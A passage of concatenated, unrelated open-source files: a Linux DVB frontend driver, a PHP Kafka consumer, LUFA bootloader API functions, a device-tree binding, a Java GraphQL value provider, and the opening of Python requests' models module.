0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };
__be32 freq;
__be32 sym_rate;
__be32 band;
__be32 lnb_voltage;
freq = htonl(p->frequency +
(state->hi_band ? LOF_HI : LOF_LO));
memcpy(&b[4], &freq, sizeof(u32));
sym_rate = htonl(p->symbol_rate);
memcpy(&b[12], &sym_rate, sizeof(u32));
band = htonl(state->hi_band ? LOF_HI : LOF_LO);
memcpy(&b[24], &band, sizeof(u32));
lnb_voltage = htonl(state->voltage);
memcpy(&b[28], &lnb_voltage, sizeof(u32));
state->config->send_command(fe, 0x71, sizeof(b), b, NULL, NULL);
return 0;
}
static int ttusbdecfe_dvbs_diseqc_send_master_cmd(struct dvb_frontend* fe, struct dvb_diseqc_master_cmd *cmd)
{
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
u8 b[] = { 0x00, 0xff, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00 };
memcpy(&b[4], cmd->msg, cmd->msg_len);
state->config->send_command(fe, 0x72,
sizeof(b) - (6 - cmd->msg_len), b,
NULL, NULL);
return 0;
}
static int ttusbdecfe_dvbs_set_tone(struct dvb_frontend* fe, fe_sec_tone_mode_t tone)
{
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
state->hi_band = (SEC_TONE_ON == tone);
return 0;
}
static int ttusbdecfe_dvbs_set_voltage(struct dvb_frontend* fe, fe_sec_voltage_t voltage)
{
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
switch (voltage) {
case SEC_VOLTAGE_13:
state->voltage = 13;
break;
case SEC_VOLTAGE_18:
state->voltage = 18;
break;
default:
return -EINVAL;
}
return 0;
}
static void ttusbdecfe_release(struct dvb_frontend* fe)
{
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
kfree(state);
}
static struct dvb_frontend_ops ttusbdecfe_dvbt_ops;
struct dvb_frontend* ttusbdecfe_dvbt_attach(const struct ttusbdecfe_config* config)
{
struct ttusbdecfe_state* state = NULL;
/* allocate memory for the internal state */
state = kmalloc(sizeof(struct ttusbdecfe_state), GFP_KERNEL);
if (state == NULL)
return NULL;
/* setup the state */
state->config = config;
/* create dvb_frontend */
memcpy(&state->frontend.ops, &ttusbdecfe_dvbt_ops, sizeof(struct dvb_frontend_ops));
state->frontend.demodulator_priv = state;
return &state->frontend;
}
static struct dvb_frontend_ops ttusbdecfe_dvbs_ops;
struct dvb_frontend* ttusbdecfe_dvbs_attach(const struct ttusbdecfe_config* config)
{
struct ttusbdecfe_state* state = NULL;
/* allocate memory for the internal state */
state = kmalloc(sizeof(struct ttusbdecfe_state), GFP_KERNEL);
if (state == NULL)
return NULL;
/* setup the state */
state->config = config;
state->voltage = 0;
state->hi_band = 0;
/* create dvb_frontend */
memcpy(&state->frontend.ops, &ttusbdecfe_dvbs_ops, sizeof(struct dvb_frontend_ops));
state->frontend.demodulator_priv = state;
return &state->frontend;
}
static struct dvb_frontend_ops ttusbdecfe_dvbt_ops = {
.delsys = { SYS_DVBT },
.info = {
.name = "TechnoTrend/Hauppauge DEC2000-t Frontend",
.frequency_min = 51000000,
.frequency_max = 858000000,
.frequency_stepsize = 62500,
.caps = FE_CAN_FEC_1_2 | FE_CAN_FEC_2_3 | FE_CAN_FEC_3_4 |
FE_CAN_FEC_5_6 | FE_CAN_FEC_7_8 | FE_CAN_FEC_AUTO |
FE_CAN_QAM_16 | FE_CAN_QAM_64 | FE_CAN_QAM_AUTO |
FE_CAN_TRANSMISSION_MODE_AUTO | FE_CAN_GUARD_INTERVAL_AUTO |
FE_CAN_HIERARCHY_AUTO,
},
.release = ttusbdecfe_release,
.set_frontend = ttusbdecfe_dvbt_set_frontend,
.get_tune_settings = ttusbdecfe_dvbt_get_tune_settings,
.read_status = ttusbdecfe_dvbt_read_status,
};
static struct dvb_frontend_ops ttusbdecfe_dvbs_ops = {
.delsys = { SYS_DVBS },
.info = {
.name = "TechnoTrend/Hauppauge DEC3000-s Frontend",
.frequency_min = 950000,
.frequency_max = 2150000,
.frequency_stepsize = 125,
.symbol_rate_min = 1000000, /* guessed */
.symbol_rate_max = 45000000, /* guessed */
.caps = FE_CAN_FEC_1_2 | FE_CAN_FEC_2_3 | FE_CAN_FEC_3_4 |
FE_CAN_FEC_5_6 | FE_CAN_FEC_7_8 | FE_CAN_FEC_AUTO |
FE_CAN_QPSK
},
.release = ttusbdecfe_release,
.set_frontend = ttusbdecfe_dvbs_set_frontend,
.read_status = ttusbdecfe_dvbs_read_status,
.diseqc_send_master_cmd = ttusbdecfe_dvbs_diseqc_send_master_cmd,
.set_voltage = ttusbdecfe_dvbs_set_voltage,
.set_tone = ttusbdecfe_dvbs_set_tone,
};
MODULE_DESCRIPTION("TTUSB DEC DVB-T/S Demodulator driver");
MODULE_AUTHOR("Alex Woods/Andrew de Quincey");
MODULE_LICENSE("GPL");
EXPORT_SYMBOL(ttusbdecfe_dvbt_attach);
EXPORT_SYMBOL(ttusbdecfe_dvbs_attach);
| {
"pile_set_name": "Github"
} |
<?php
declare(strict_types=1);
namespace Kafka\Consumer;
use Kafka\Broker;
use Kafka\ConsumerConfig;
use Kafka\Exception;
use Kafka\LoggerTrait;
use Kafka\Protocol;
use Kafka\Protocol\Protocol as ProtocolTool;
use Psr\Log\LoggerAwareTrait;
use function count;
use function end;
use function explode;
use function in_array;
use function json_encode;
use function shuffle;
use function sprintf;
use function substr;
use function trim;
class Process
{
use LoggerAwareTrait;
use LoggerTrait;
/**
* @var callable|null
*/
protected $consumer;
/**
* @var string[][][]
*/
protected $messages = [];
/**
* @var State
*/
private $state;
public function __construct(?callable $consumer = null)
{
$this->consumer = $consumer;
}
public function init(): void
{
$config = $this->getConfig();
Protocol::init($config->getBrokerVersion(), $this->logger);
$broker = $this->getBroker();
$broker->setConfig($config);
$broker->setProcess(function (string $data, int $fd): void {
$this->processRequest($data, $fd);
});
$this->state = State::getInstance();
if ($this->logger) {
$this->state->setLogger($this->logger);
}
$this->state->setCallback(
[
State::REQUEST_METADATA => function (): void {
$this->syncMeta();
},
State::REQUEST_GETGROUP => function (): void {
$this->getGroupBrokerId();
},
State::REQUEST_JOINGROUP => function (): void {
$this->joinGroup();
},
State::REQUEST_SYNCGROUP => function (): void {
$this->syncGroup();
},
State::REQUEST_HEARTGROUP => function (): void {
$this->heartbeat();
},
State::REQUEST_OFFSET => function (): array {
return $this->offset();
},
State::REQUEST_FETCH_OFFSET => function (): void {
$this->fetchOffset();
},
State::REQUEST_FETCH => function (): array {
return $this->fetch();
},
State::REQUEST_COMMIT_OFFSET => function (): void {
$this->commit();
},
]
);
$this->state->init();
}
public function start(): void
{
$this->init();
$this->state->start();
}
public function stop(): void
{
// TODO: we should remove the consumer from the group here
$this->state->stop();
}
/**
* @throws Exception
*/
protected function processRequest(string $data, int $fd): void
{
$correlationId = ProtocolTool::unpack(ProtocolTool::BIT_B32, substr($data, 0, 4));
switch ($correlationId) {
case Protocol::METADATA_REQUEST:
$result = Protocol::decode(Protocol::METADATA_REQUEST, substr($data, 4));
if (! isset($result['brokers'], $result['topics'])) {
                    $this->error('Failed to get metadata, brokers or topics is null.');
$this->state->failRun(State::REQUEST_METADATA);
break;
}
/** @var Broker $broker */
$broker = $this->getBroker();
$isChange = $broker->setData($result['topics'], $result['brokers']);
$this->state->succRun(State::REQUEST_METADATA, $isChange);
break;
case Protocol::GROUP_COORDINATOR_REQUEST:
$result = Protocol::decode(Protocol::GROUP_COORDINATOR_REQUEST, substr($data, 4));
if (! isset($result['errorCode'], $result['coordinatorId']) || $result['errorCode'] !== Protocol::NO_ERROR) {
$this->state->failRun(State::REQUEST_GETGROUP);
break;
}
/** @var Broker $broker */
$broker = $this->getBroker();
$broker->setGroupBrokerId($result['coordinatorId']);
$this->state->succRun(State::REQUEST_GETGROUP);
break;
case Protocol::JOIN_GROUP_REQUEST:
$result = Protocol::decode(Protocol::JOIN_GROUP_REQUEST, substr($data, 4));
if (isset($result['errorCode']) && $result['errorCode'] === Protocol::NO_ERROR) {
$this->succJoinGroup($result);
break;
}
$this->failJoinGroup($result['errorCode']);
break;
case Protocol::SYNC_GROUP_REQUEST:
$result = Protocol::decode(Protocol::SYNC_GROUP_REQUEST, substr($data, 4));
if (isset($result['errorCode']) && $result['errorCode'] === Protocol::NO_ERROR) {
$this->succSyncGroup($result);
break;
}
$this->failSyncGroup($result['errorCode']);
break;
case Protocol::HEART_BEAT_REQUEST:
$result = Protocol::decode(Protocol::HEART_BEAT_REQUEST, substr($data, 4));
if (isset($result['errorCode']) && $result['errorCode'] === Protocol::NO_ERROR) {
$this->state->succRun(State::REQUEST_HEARTGROUP);
break;
}
$this->failHeartbeat($result['errorCode']);
break;
case Protocol::OFFSET_REQUEST:
$result = Protocol::decode(Protocol::OFFSET_REQUEST, substr($data, 4));
$this->succOffset($result, $fd);
break;
case ProtocolTool::OFFSET_FETCH_REQUEST:
$result = Protocol::decode(Protocol::OFFSET_FETCH_REQUEST, substr($data, 4));
$this->succFetchOffset($result);
break;
case ProtocolTool::FETCH_REQUEST:
$result = Protocol::decode(Protocol::FETCH_REQUEST, substr($data, 4));
$this->succFetch($result, $fd);
break;
case ProtocolTool::OFFSET_COMMIT_REQUEST:
$result = Protocol::decode(Protocol::OFFSET_COMMIT_REQUEST, substr($data, 4));
$this->succCommit($result);
break;
default:
$this->error('Error request, correlationId:' . $correlationId);
}
}
protected function syncMeta(): void
{
$this->debug('Start sync metadata request');
$config = $this->getConfig();
$brokerList = $config->getMetadataBrokerList();
$brokerHost = [];
foreach (explode(',', $brokerList) as $key => $val) {
if (trim($val)) {
$brokerHost[] = $val;
}
}
if (count($brokerHost) === 0) {
throw new Exception('No valid broker configured');
}
shuffle($brokerHost);
$broker = $this->getBroker();
foreach ($brokerHost as $host) {
$socket = $broker->getMetaConnect($host);
if ($socket === null) {
continue;
}
$params = $config->getTopics();
$this->debug('Start sync metadata request params:' . json_encode($params));
$requestData = Protocol::encode(Protocol::METADATA_REQUEST, $params);
$socket->write($requestData);
return;
}
throw Exception\ConnectionException::fromBrokerList($brokerList);
}
protected function getGroupBrokerId(): void
{
$broker = $this->getBroker();
$connect = $broker->getRandConnect();
if ($connect === null) {
return;
}
$config = $this->getConfig();
$params = ['group_id' => $config->getGroupId()];
$requestData = Protocol::encode(Protocol::GROUP_COORDINATOR_REQUEST, $params);
$connect->write($requestData);
}
protected function joinGroup(): void
{
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$topics = $this->getConfig()->getTopics();
$assign = $this->getAssignment();
$memberId = $assign->getMemberId();
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'session_timeout' => $this->getConfig()->getSessionTimeout(),
'rebalance_timeout' => $this->getConfig()->getRebalanceTimeout(),
'member_id' => $memberId ?? '',
'data' => [
[
'protocol_name' => 'range',
'version' => 0,
'subscription' => $topics,
'user_data' => '',
],
],
];
$requestData = Protocol::encode(Protocol::JOIN_GROUP_REQUEST, $params);
$connect->write($requestData);
$this->debug('Join group start, params:' . json_encode($params));
}
public function failJoinGroup(int $errorCode): void
{
$assign = $this->getAssignment();
$memberId = $assign->getMemberId();
$this->error(sprintf('Join group fail, need rejoin, errorCode %d, memberId: %s', $errorCode, $memberId));
$this->stateConvert($errorCode);
}
/**
* @param mixed[] $result
*/
public function succJoinGroup(array $result): void
{
$this->state->succRun(State::REQUEST_JOINGROUP);
$assign = $this->getAssignment();
$assign->setMemberId($result['memberId']);
$assign->setGenerationId($result['generationId']);
if ($result['leaderId'] === $result['memberId']) { // leader assign partition
$assign->assign($result['members']);
}
        $this->debug(sprintf('Join group success, params: %s', json_encode($result)));
}
public function syncGroup(): void
{
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$assign = $this->getAssignment();
$memberId = $assign->getMemberId();
$generationId = $assign->getGenerationId();
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'generation_id' => $generationId ?? null,
'member_id' => $memberId,
'data' => $assign->getAssignments(),
];
$requestData = Protocol::encode(Protocol::SYNC_GROUP_REQUEST, $params);
$this->debug('Sync group start, params:' . json_encode($params));
$connect->write($requestData);
}
public function failSyncGroup(int $errorCode): void
{
$this->error(sprintf('Sync group fail, need rejoin, errorCode %d', $errorCode));
$this->stateConvert($errorCode);
}
/**
* @param mixed[][] $result
*/
public function succSyncGroup(array $result): void
{
        $this->debug(sprintf('Sync group success, params: %s', json_encode($result)));
$this->state->succRun(State::REQUEST_SYNCGROUP);
$topics = $this->getBroker()->getTopics();
$brokerToTopics = [];
foreach ($result['partitionAssignments'] as $topic) {
foreach ($topic['partitions'] as $partId) {
$brokerId = $topics[$topic['topicName']][$partId];
$brokerToTopics[$brokerId] = $brokerToTopics[$brokerId] ?? [];
$topicInfo = $brokerToTopics[$brokerId][$topic['topicName']] ?? [];
$topicInfo['topic_name'] = $topic['topicName'];
$topicInfo['partitions'] = $topicInfo['partitions'] ?? [];
$topicInfo['partitions'][] = $partId;
$brokerToTopics[$brokerId][$topic['topicName']] = $topicInfo;
}
}
$assign = $this->getAssignment();
$assign->setTopics($brokerToTopics);
}
protected function heartbeat(): void
{
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$assign = $this->getAssignment();
$memberId = $assign->getMemberId();
if (trim($memberId) === '') {
return;
}
$generationId = $assign->getGenerationId();
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'generation_id' => $generationId,
'member_id' => $memberId,
];
$requestData = Protocol::encode(Protocol::HEART_BEAT_REQUEST, $params);
$connect->write($requestData);
}
public function failHeartbeat(int $errorCode): void
{
$this->error('Heartbeat error, errorCode:' . $errorCode);
$this->stateConvert($errorCode);
}
/**
* @return int[]
*/
protected function offset(): array
{
$context = [];
$broker = $this->getBroker();
$topics = $this->getAssignment()->getTopics();
foreach ($topics as $brokerId => $topicList) {
$connect = $broker->getMetaConnect((string) $brokerId);
if ($connect === null) {
return [];
}
$data = [];
foreach ($topicList as $topic) {
$item = [
'topic_name' => $topic['topic_name'],
'partitions' => [],
];
foreach ($topic['partitions'] as $partId) {
$item['partitions'][] = [
'partition_id' => $partId,
'offset' => 1,
'time' => -1,
];
$data[] = $item;
}
}
$params = [
'replica_id' => -1,
'data' => $data,
];
$stream = $connect->getSocket();
$requestData = Protocol::encode(Protocol::OFFSET_REQUEST, $params);
$connect->write($requestData);
$context[] = (int) $stream;
}
return $context;
}
/**
* @param mixed[][] $result
*/
public function succOffset(array $result, int $fd): void
{
$offsets = $this->getAssignment()->getOffsets();
$lastOffsets = $this->getAssignment()->getLastOffsets();
foreach ($result as $topic) {
foreach ($topic['partitions'] as $part) {
if ($part['errorCode'] !== Protocol::NO_ERROR) {
$this->stateConvert($part['errorCode']);
break 2;
}
$offsets[$topic['topicName']][$part['partition']] = end($part['offsets']);
$lastOffsets[$topic['topicName']][$part['partition']] = $part['offsets'][0];
}
}
$this->getAssignment()->setOffsets($offsets);
$this->getAssignment()->setLastOffsets($lastOffsets);
$this->state->succRun(State::REQUEST_OFFSET, $fd);
}
protected function fetchOffset(): void
{
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$topics = $this->getAssignment()->getTopics();
$data = [];
foreach ($topics as $brokerId => $topicList) {
foreach ($topicList as $topic) {
$partitions = [];
if (isset($data[$topic['topic_name']]['partitions'])) {
$partitions = $data[$topic['topic_name']]['partitions'];
}
foreach ($topic['partitions'] as $partId) {
$partitions[] = $partId;
}
$data[$topic['topic_name']]['partitions'] = $partitions;
$data[$topic['topic_name']]['topic_name'] = $topic['topic_name'];
}
}
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'data' => $data,
];
$requestData = Protocol::encode(Protocol::OFFSET_FETCH_REQUEST, $params);
$connect->write($requestData);
}
/**
* @param mixed[] $result
*/
public function succFetchOffset(array $result): void
{
        $msg = sprintf('Get current fetch offset success, result: %s', json_encode($result));
$this->debug($msg);
$assign = $this->getAssignment();
$offsets = $assign->getFetchOffsets();
foreach ($result as $topic) {
foreach ($topic['partitions'] as $part) {
if ($part['errorCode'] !== 0) {
$this->stateConvert($part['errorCode']);
break 2;
}
$offsets[$topic['topicName']][$part['partition']] = $part['offset'];
}
}
$assign->setFetchOffsets($offsets);
$consumerOffsets = $assign->getConsumerOffsets();
$lastOffsets = $assign->getLastOffsets();
if (empty($consumerOffsets)) {
$consumerOffsets = $assign->getFetchOffsets();
foreach ($consumerOffsets as $topic => $value) {
foreach ($value as $partId => $offset) {
if (isset($lastOffsets[$topic][$partId]) && $lastOffsets[$topic][$partId] > $offset) {
$consumerOffsets[$topic][$partId] = $offset + 1;
}
}
}
$assign->setConsumerOffsets($consumerOffsets);
$assign->setCommitOffsets($assign->getFetchOffsets());
}
$this->state->succRun(State::REQUEST_FETCH_OFFSET);
}
/**
* @return int[]
*/
protected function fetch(): array
{
$this->messages = [];
$context = [];
$broker = $this->getBroker();
$topics = $this->getAssignment()->getTopics();
$consumerOffsets = $this->getAssignment()->getConsumerOffsets();
foreach ($topics as $brokerId => $topicList) {
$connect = $broker->getDataConnect((string) $brokerId);
if ($connect === null) {
return [];
}
$data = [];
foreach ($topicList as $topic) {
$item = [
'topic_name' => $topic['topic_name'],
'partitions' => [],
];
foreach ($topic['partitions'] as $partId) {
$item['partitions'][] = [
'partition_id' => $partId,
'offset' => isset($consumerOffsets[$topic['topic_name']][$partId]) ? $consumerOffsets[$topic['topic_name']][$partId] : 0,
'max_bytes' => $this->getConfig()->getMaxBytes(),
];
}
$data[] = $item;
}
$params = [
'max_wait_time' => $this->getConfig()->getMaxWaitTime(),
'replica_id' => -1,
'min_bytes' => '1000',
'data' => $data,
];
$this->debug('Fetch message start, params:' . json_encode($params));
$requestData = Protocol::encode(Protocol::FETCH_REQUEST, $params);
$connect->write($requestData);
$context[] = (int) $connect->getSocket();
}
return $context;
}
/**
* @param mixed[][][] $result
*/
public function succFetch(array $result, int $fd): void
{
$assign = $this->getAssignment();
$this->debug('Fetch success, result:' . json_encode($result));
foreach ($result['topics'] as $topic) {
foreach ($topic['partitions'] as $part) {
$context = [
$topic['topicName'],
$part['partition'],
];
if ($part['errorCode'] !== 0) {
$this->stateConvert($part['errorCode'], $context);
continue;
}
$offset = $assign->getConsumerOffset($topic['topicName'], $part['partition']);
if ($offset === null) {
                    return; // currently rejoining, skip processing this partition
}
foreach ($part['messages'] as $message) {
$this->messages[$topic['topicName']][$part['partition']][] = $message;
$offset = $message['offset'];
}
$consumerOffset = ($part['highwaterMarkOffset'] > $offset) ? ($offset + 1) : $offset;
$assign->setConsumerOffset($topic['topicName'], $part['partition'], $consumerOffset);
$assign->setCommitOffset($topic['topicName'], $part['partition'], $offset);
}
}
$this->state->succRun(State::REQUEST_FETCH, $fd);
}
protected function consumeMessage(): void
{
foreach ($this->messages as $topic => $value) {
foreach ($value as $partition => $messages) {
foreach ($messages as $message) {
if ($this->consumer !== null) {
($this->consumer)($topic, $partition, $message);
}
}
}
}
$this->messages = [];
}
protected function commit(): void
{
$config = $this->getConfig();
if ($config->getConsumeMode() === ConsumerConfig::CONSUME_BEFORE_COMMIT_OFFSET) {
$this->consumeMessage();
}
$broker = $this->getBroker();
$groupBrokerId = $broker->getGroupBrokerId();
$connect = $broker->getMetaConnect((string) $groupBrokerId);
if ($connect === null) {
return;
}
$commitOffsets = $this->getAssignment()->getCommitOffsets();
$topics = $this->getAssignment()->getTopics();
$this->getAssignment()->setPreCommitOffsets($commitOffsets);
$data = [];
foreach ($topics as $brokerId => $topicList) {
foreach ($topicList as $topic) {
$partitions = [];
if (isset($data[$topic['topic_name']]['partitions'])) {
$partitions = $data[$topic['topic_name']]['partitions'];
}
foreach ($topic['partitions'] as $partId) {
if ($commitOffsets[$topic['topic_name']][$partId] === -1) {
continue;
}
$partitions[$partId]['partition'] = $partId;
$partitions[$partId]['offset'] = $commitOffsets[$topic['topic_name']][$partId];
}
$data[$topic['topic_name']]['partitions'] = $partitions;
$data[$topic['topic_name']]['topic_name'] = $topic['topic_name'];
}
}
$params = [
'group_id' => $this->getConfig()->getGroupId(),
'generation_id' => $this->getAssignment()->getGenerationId(),
'member_id' => $this->getAssignment()->getMemberId(),
'data' => $data,
];
$this->debug('Commit current fetch offset start, params:' . json_encode($params));
$requestData = Protocol::encode(Protocol::OFFSET_COMMIT_REQUEST, $params);
$connect->write($requestData);
}
/**
* @param mixed[][] $result
*/
public function succCommit(array $result): void
{
$this->debug('Commit success, result:' . json_encode($result));
$this->state->succRun(State::REQUEST_COMMIT_OFFSET);
foreach ($result as $topic) {
foreach ($topic['partitions'] as $part) {
if ($part['errorCode'] !== 0) {
$this->stateConvert($part['errorCode']);
                    return; // do not call the user consumer function
}
}
}
if ($this->getConfig()->getConsumeMode() === ConsumerConfig::CONSUME_AFTER_COMMIT_OFFSET) {
$this->consumeMessage();
}
}
/**
* @param string[] $context
*/
protected function stateConvert(int $errorCode, ?array $context = null): bool
{
$this->error(Protocol::getError($errorCode));
$recoverCodes = [
Protocol::UNKNOWN_TOPIC_OR_PARTITION,
Protocol::NOT_LEADER_FOR_PARTITION,
Protocol::BROKER_NOT_AVAILABLE,
Protocol::GROUP_LOAD_IN_PROGRESS,
Protocol::GROUP_COORDINATOR_NOT_AVAILABLE,
Protocol::NOT_COORDINATOR_FOR_GROUP,
Protocol::INVALID_TOPIC,
Protocol::INCONSISTENT_GROUP_PROTOCOL,
Protocol::INVALID_GROUP_ID,
];
$rejoinCodes = [
Protocol::ILLEGAL_GENERATION,
Protocol::INVALID_SESSION_TIMEOUT,
Protocol::REBALANCE_IN_PROGRESS,
Protocol::UNKNOWN_MEMBER_ID,
];
$assign = $this->getAssignment();
if (in_array($errorCode, $recoverCodes, true)) {
$this->state->recover();
$assign->clearOffset();
return false;
}
if (in_array($errorCode, $rejoinCodes, true)) {
if ($errorCode === Protocol::UNKNOWN_MEMBER_ID) {
$assign->setMemberId('');
}
$assign->clearOffset();
$this->state->rejoin();
return false;
}
if ($errorCode === Protocol::OFFSET_OUT_OF_RANGE) {
$resetOffset = $this->getConfig()->getOffsetReset();
$offsets = $resetOffset === 'latest' ? $assign->getLastOffsets() : $assign->getOffsets();
[$topic, $partId] = $context;
if (isset($offsets[$topic][$partId])) {
$assign->setConsumerOffset($topic, (int) $partId, $offsets[$topic][$partId]);
}
}
return true;
}
private function getBroker(): Broker
{
return Broker::getInstance();
}
private function getConfig(): ConsumerConfig
{
return ConsumerConfig::getInstance();
}
private function getAssignment(): Assignment
{
return Assignment::getInstance();
}
}
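// Illustrative wiring only; the ConsumerConfig setter names are assumptions inferred
// from the getters used above (getMetadataBrokerList(), getGroupId(), getTopics()):
//
//     $config = \Kafka\ConsumerConfig::getInstance();
//     $config->setMetadataBrokerList('127.0.0.1:9092');
//     $config->setGroupId('example-group');
//     $config->setTopics(['example-topic']);
//
//     $process = new \Kafka\Consumer\Process(function ($topic, $partition, $message): void {
//         // handle a single consumed message
//     });
//     $process->start();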
| {
"pile_set_name": "Github"
} |
/*
LUFA Library
Copyright (C) Dean Camera, 2015.
dean [at] fourwalledcubicle [dot] com
www.lufa-lib.org
*/
/*
Copyright 2015 Dean Camera (dean [at] fourwalledcubicle [dot] com)
Permission to use, copy, modify, distribute, and sell this
software and its documentation for any purpose is hereby granted
without fee, provided that the above copyright notice appear in
all copies and that both that the copyright notice and this
permission notice and warranty disclaimer appear in supporting
documentation, and that the name of the author not be used in
advertising or publicity pertaining to distribution of the
software without specific, written prior permission.
The author disclaims all warranties with regard to this
software, including all implied warranties of merchantability
and fitness. In no event shall the author be liable for any
special, indirect or consequential damages or any damages
whatsoever resulting from loss of use, data or profits, whether
in an action of contract, negligence or other tortious action,
arising out of or in connection with the use or performance of
this software.
*/
/** \file
*
* Bootloader user application API functions.
*/
#include "BootloaderAPI.h"
void BootloaderAPI_ErasePage(const uint32_t Address)
{
boot_page_erase_safe(Address);
boot_spm_busy_wait();
boot_rww_enable();
}
void BootloaderAPI_WritePage(const uint32_t Address)
{
boot_page_write_safe(Address);
boot_spm_busy_wait();
boot_rww_enable();
}
void BootloaderAPI_FillWord(const uint32_t Address, const uint16_t Word)
{
boot_page_fill_safe(Address, Word);
}
uint8_t BootloaderAPI_ReadSignature(const uint16_t Address)
{
return boot_signature_byte_get(Address);
}
uint8_t BootloaderAPI_ReadFuse(const uint16_t Address)
{
return boot_lock_fuse_bits_get(Address);
}
uint8_t BootloaderAPI_ReadLock(void)
{
return boot_lock_fuse_bits_get(GET_LOCK_BITS);
}
void BootloaderAPI_WriteLock(const uint8_t LockBits)
{
boot_lock_bits_set_safe(LockBits);
}
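/* Illustrative flash page update built from the API above (PageAddress and DataWords
 * are placeholders; SPM_PAGESIZE comes from the AVR device headers):
 *
 *     BootloaderAPI_ErasePage(PageAddress);
 *     for (uint16_t i = 0; i < SPM_PAGESIZE; i += 2)
 *         BootloaderAPI_FillWord(PageAddress + i, DataWords[i / 2]);
 *     BootloaderAPI_WritePage(PageAddress);
 */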
| {
"pile_set_name": "Github"
} |
Ricoh RN5T567 PMIC
This file describes the binding info for the PMIC driver.
Required properties:
- compatible: "ricoh,rn5t567"
- reg: depending on strapping, e.g. 0x33
With those two properties, the PMIC device can be used to read/write
registers.
Example:
rn5t567@33 {
compatible = "ricoh,rn5t567";
reg = <0x33>;
};
| {
"pile_set_name": "Github"
} |
package io.leangen.graphql.metadata.strategy.value;
import io.leangen.graphql.execution.GlobalEnvironment;
import io.leangen.graphql.metadata.strategy.type.DefaultTypeInfoGenerator;
import io.leangen.graphql.util.Defaults;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.lang.reflect.AnnotatedElement;
import java.lang.reflect.AnnotatedType;
import java.util.Collections;
/**
* @author Bojan Tomic (kaqqao)
*/
public class JsonDefaultValueProvider implements DefaultValueProvider {
private final ValueMapper valueMapper;
private static final Logger log = LoggerFactory.getLogger(JsonDefaultValueProvider.class);
public JsonDefaultValueProvider(GlobalEnvironment environment) {
this.valueMapper = Defaults.valueMapperFactory(new DefaultTypeInfoGenerator())
.getValueMapper(Collections.emptyMap(), environment);
}
@Override
public Object getDefaultValue(AnnotatedElement targetElement, AnnotatedType type, Object initialValue) {
return valueMapper.fromString((String) initialValue, type);
}
}
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import collections
import datetime
from io import BytesIO, UnsupportedOperation
from .hooks import default_hooks
from .structures import CaseInsensitiveDict
from .auth import HTTPBasicAuth
from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar
from .packages.urllib3.fields import RequestField
from .packages.urllib3.filepost import encode_multipart_formdata
from .packages.urllib3.util import parse_url
from .packages.urllib3.exceptions import (
DecodeError, ReadTimeoutError, ProtocolError, LocationParseError)
from .exceptions import (
HTTPError, MissingSchema, InvalidURL, ChunkedEncodingError,
ContentDecodingError, ConnectionError, StreamConsumedError)
from .utils import (
guess_filename, get_auth_from_url, requote_uri,
stream_decode_response_unicode, to_key_val_list, parse_header_links,
iter_slices, guess_json_utf, super_len, to_native_string)
from .compat import (
cookielib, urlunparse, urlsplit, urlencode, str, bytes, StringIO,
is_py2, chardet, builtin_str, basestring)
from .compat import json as complexjson
from .status_codes import codes
#: The set of HTTP status codes that indicate an automatically
#: processable redirect.
REDIRECT_STATI = (
codes.moved, # 301
codes.found, # 302
codes.other, # 303
codes.temporary_redirect, # 307
codes.permanent_redirect, # 308
)
DEFAULT_REDIRECT_LIMIT = 30
CONTENT_CHUNK_SIZE = 10 * 1024
ITER_CHUNK_SIZE = 512
class RequestEncodingMixin(object):
@property
def path_url(self):
"""Build the path URL to use."""
url = []
p = urlsplit(self.url)
path = p.path
if not path:
path = '/'
url.append(path)
query = p.query
if query:
url.append('?')
url.append(query)
return ''.join(url)
@staticmethod
def _encode_params(data):
"""Encode parameters in a piece of data.
Will successfully encode parameters when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
if parameters are supplied as a dict.
"""
if isinstance(data, (str, bytes)):
return data
elif hasattr(data, 'read'):
return data
elif hasattr(data, '__iter__'):
result = []
for k, vs in to_key_val_list(data):
if isinstance(vs, basestring) or not hasattr(vs, '__iter__'):
vs = [vs]
for v in vs:
if v is not None:
result.append(
(k.encode('utf-8') if isinstance(k, str) else k,
v.encode('utf-8') if isinstance(v, str) else v))
return urlencode(result, doseq=True)
else:
return data
@staticmethod
def _encode_files(files, data):
"""Build the body for a multipart/form-data request.
Will successfully encode files when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
if parameters are supplied as a dict.
"""
if (not files):
raise ValueError("Files must be provided.")
elif isinstance(data, basestring):
raise ValueError("Data must not be a string.")
new_fields = []
fields = to_key_val_list(data or {})
files = to_key_val_list(files or {})
for field, val in fields:
if isinstance(val, basestring) or not hasattr(val, '__iter__'):
val = [val]
for v in val:
if v is not None:
# Don't call str() on bytestrings: in Py3 it all goes wrong.
if not isinstance(v, bytes):
v = str(v)
new_fields.append(
(field.decode('utf-8') if isinstance(field, bytes) else field,
v.encode('utf-8') if isinstance(v, str) else v))
for (k, v) in files:
# support for explicit filename
ft = None
fh = None
